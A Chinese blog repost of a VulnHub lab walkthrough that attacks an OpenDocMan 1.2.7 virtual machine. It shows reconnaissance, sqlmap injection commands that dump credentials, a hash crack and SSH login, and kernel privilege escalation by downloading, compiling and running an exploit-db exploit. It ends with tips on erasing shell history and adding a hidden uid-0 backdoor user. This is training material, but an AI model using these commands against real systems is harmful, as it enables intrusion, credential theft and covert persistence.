Linux渗透测试

最新推荐文章于 2024-05-12 13:19:07 发布
最新推荐文章于 2024-05-12 13:19:07 发布
阅读量934 收藏 4
点赞数
分类专栏: 信安之路 文章标签: web安全
原文链接:https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247484536&idx=1&sn=b3a6d4891bdab58382ced99a9ca1647c&chksm=ec1e3450db69bd46e7640e740f392d0501b2650d8f5174e9cf1c1bd0d36d8467792f0b8d7750&token=2038700666&lang=zh_CN#rd
版权

最近发现了一个不错的靶场,里面各种渗透测试的虚拟机,大家可以下载进行尝试学习。还有就是一个漏洞利用存档,可以找到很多我们可以利用的学习的东西。

靶场:

https://www.vulnhub.com

漏洞利用存档:

https://www.exploit-db.com

0x01 信息搜集

  • 首先就是确定我们靶机的目标IP nmap -sP -T5 192.168.0.1/24<!---more---> 

      通过前面的步骤,我们对目标进行具体的端口扫描以及操作系统识别,发现开启有80,22以及6667端口。 nmap -sV -p- -A -O -T4 192.168.0.170 

  • 目录扫描 继续对目标进行敏感目录扫描,御剑等工具都可以。这里我使用KALI的nikto以及dirb命令进行简单的目录扫描。 nikto -host http://192.168.0.170或者dirb http://192.168.0.170

0x02 漏洞发现

访问IP之后的页面,发现并没有什么特别的地方,于是只能查看源代码,点击超链接进行查看。 

在链接的地方竟然发现了秘密的地方,于是访问之 

此处是一个登录界面,我们可以尝试注册一个用户进行登录,但只是一个游客的形式。 我们注册一个用户进行登录,还有有很多功能的,于是可以进行更多的尝试。 

在下面发现OpenDocMan v1.2.7, OpenDocMan是一个功能完整的基于Web的文档管理系统(DMS),于是找找OpenDocMan v1.2.7所公布的一些可以利用的漏洞。 

发现可以利用的好几个漏洞,于是先行尝试sql注入。

0x03 漏洞利用

经过简单的测试发现http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user处确实注入。 

 于是直接拿出神器Sqlmap进行注入。 sqlmap.py -u "http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --dbs  经过常见的那几个命令我们可以成功的拿到登录名和密码。

sqlmap.py -u "http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs --tables
sqlmap.py -u "http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs -T odm_admin --columns

发现admin表里面没有信息,只能从user表里面提取信息。

sqlmap.py -u "http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs -T odm_user --columns`
sqlmap.py -u "http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs -T odm_user -C "username,password" --dump

我们可以看到已经获取到了数据库的用户名和密码,直接MD5解密就可以ssh登录服务器。 

 用户名webmin,密码b78aae356709f8c31118ea613980954b,明文为webmin

0x04 权限提升

经过前面端口扫描可以发现,22端口发放着,可以进行ssh连接。ssh webmin@192.168.0.170 

       查看权限发现是普通用户的权限,所以得继续进行提权操作。获取到低权限SHELL后我们通常做下面几件事:

  • 检测操作系统的发行版本

  • 查看内核版本

  • 检测当前用户权限

  • 列举Suid文件

  • 查看已经安装的包,程序,运行的服务,过期版本的有可能有漏洞

lsb_release -a查看系统的发行版本 

 uname -a查看内核版本 

我们可以看到此操作系统采用的是Ubuntu 14.04.4 LTS,内核版本是3.13.0-24-generic,首先想到的就是去漏洞库寻找有没有可以用的exploit。

下载漏洞exploit

wget https://www.exploit-db.com/download/37292mv 37292 shell.cgcc -o shell shell.c./shell

附Linux渗透小技巧:

  • bash去掉history记录 export HISTSIZE=0 export HISTFILE=/dev/null

  • Linux添加uid为0的用户 useradd -o -u 0 cnbird

  • 可以翻下 mysql_history .bash_history

  • ls -al 看下root目录下都有什么隐藏目录 例如 .ssh .vnc 等

  • 可以看下 .ssh/下面的ssh连接记录等,也可以看下全局变量文件什么的

  • 通过webshell反弹shell回来之后获取真正的ttyshell python -c 'import pty; pty.spawn("/bin/sh")'

myh0st@信安之路
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
红蓝对抗之Linux内网渗透
Tencent_SRC的博客
12-11 7046
文|腾讯蓝军 jumbo前言上篇内网渗透(附录1)主要讲的是Windows这块,最近知识星球“腾讯安平密友圈”提到了一个问题“为什么内网渗透偏向于Windows”,笔者也在下面进行了相关...
Linux操作系统渗透测试
夜思红尘的博客
04-17 506
这是关于网络安全Linux操作系统的渗透测试,主要使用的事mysql注入,欢迎大家前来学习,借鉴。
linux内网渗透技巧总结
最新发布
渗透测试研究中心
05-12 651
known_hosts格式有两种,取决于你的~/.ssh/config文件中的HashKnownHosts字段的设置,有可能是明文也有可能是一段哈希字符串。如果没有~/.ssh/config文件,这取决于/etc/ssh/ssh_config文件中的该字段。今后,当你使用 PuTTY 登录时,可以在左侧的 Connection -> SSH -> Auth 中的 Private key file for authentication: 处选择你的私钥文件,然后即可登录了,过程中只需输入密钥锁码即可。
Linux-Metasploit 渗透-魔鬼教程
m0_74025111的博客
04-20 2921
这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞,换句话来说,渗透测试是指渗透人员在不同的位置(比如从内网、从外网等位置)利用各种手段对某个特定网络进行测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告,并提交给网络所有者。进行专业的渗透测试后,即使是系统未被攻破,也可以证明先前实行的防御是有效的,专业的渗透测试可以有效评估系统的安全状况,并提出合理的改进方案。用方法 -p 端口号) -sV 扫描服务器版本。
linux 测试
qianx0212的博客
10-27 1732
linux测试
Linux socket 测试
Marvin_wu
09-16 4673
Client : mini2440 Server : PC Ubuntu 网络的socket数据传输是一种特殊的I/O,socket也是一种文件描述符。socket也有一个类似于打开文件的函数:socket(),调用socket(),该函数返回一个整型的socket的描述符,随后的连接建立、数据传输等操作也都是通过该socket实现。此次测试用mini2440做Client,PC做Serve
Kali Linux渗透测试技术详解
02-19
Kali Linux渗透测试技术详解本书由浅入深地介绍了Kali Linux的各种渗透测试技术。书中选取了最核心和最基础的内容进行讲解,让读者能够掌握渗透测试的流程,而不会被高难度的内容所淹没。本书涉及面广,从基本的知识...
Kali Linux渗透测试实战
03-10
Kali Linux渗透测试实战 如果您之前使用过或者了解BackTrack系列Linux的话,那么我只需要简单的说,Kali是BackTrack的升级换代产品, 从Kali开始,BackTrack将成为历史。如果您没接触过BackTrack也没关系,我们从头...
KaliLinux渗透测试五步曲
03-23
TechTarget中国原创】KaliLinux的设计目的是渗透测试。不管渗透测试者的起点是白盒测试、黑盒测试,还是灰盒测试,在用Kali或其它工具进行渗透测试时,总要遵循一些步骤。  KaliLinux的设计目的是渗透测试。不管...
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,...课程主要内容:学习Kali Linux安全测试使用工具的使用,以及高级技巧的使用
Kali Linux渗透测试实训手册
11-08
Kali Linux渗透测试实训手册,Kali Linux渗透测试实训手册,
谁来教我渗透测试——黑客必须掌握的Linux基础
Y525698136的博客
05-23 211
上一篇我们学习了Windows基础,今天我们来看一看作为一名渗透测试工程师都需要掌握哪些Linux知识。
Kali Linux渗透测试技术详解_渗透测试入门
m0_61869253的博客
06-02 1703
Kali Linux作为攻击端,为了以后能模拟漏洞场景,我还装了一个Debian11的虚拟,Debian 11是官网下载的镜像文件,在Vmware中安装的时候有图文提示,一路安装正常,也设置了普通用户和root的登录密码,默认安装成功进入了图形化界面,作为专业开发我肯定想让他进入命令行模式,我在图形登录界面试了一下Ctro+Alt+F1-F6试了一下,Ctro+Alt+F3进入命令行,然后切换到root用户。为了方便用户进行渗透方面的工作,有人将所有的工具都预装在一个Linux系统,其中。
【附教程】2024年10款渗透测试人员必备工具(Kali Linux+Nmap+Metasploit
2401_83739777的博客
04-16 755
WireShark是非常流行的网络封包分析工具,可以截取各种网络数据包,并显示数据包详细信息。常用于开发测试过程中各种问题定位。本文主要内容包括:1、Wireshark软件下载和安装以及Wireshark主界面介绍。2、WireShark简单抓包示例。通过该例子学会怎么抓包以及如何简单查看分析数据包内容。3、Wireshark过滤器使用。通过过滤器可以筛选出想要分析的内容。包括按照协议过滤、端口和主名过滤、数据包内容过滤。
内网渗透-Linux内网渗透
lza20001103的博客
04-14 1651
内网渗透-Linux内网渗透
渗透测试(8)- Kali Linux 系统概述
fanmeng2008的博客
01-12 1301
Kali Linux 是一个基于 Debian 的 Linux 发行版,包括很多安全和取证方面的相关工具。Kali Linux 是一款全功能的安全操作系统,它可以帮助用户完成各种安全任务,包括网络渗透测试、系统攻击、密码破解、恶意软件分析、社会工程学攻击等,同时也可以用于安全研究,帮助用户发现新的安全漏洞,并确保网络安全。广泛应用于网络安全领域。
牛!渗透大佬用14个部分讲明白Kail Linux渗透测试(学完吃牢饭)
Innocence_0的博客
02-04 334
牛!渗透大佬用14个部分讲明白Kail Linux渗透测试(学完吃牢饭)
Kali Linux渗透测试实战指南
"Kali Linux 渗透测试实训手册,包含Kali中各种工具的使用方法,适合...这本手册是一份全面的Kali Linux渗透测试指南,不仅覆盖了系统的安装和配置,还深入到具体工具的使用,是安全专业人士和学生提升技能的理想教材。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值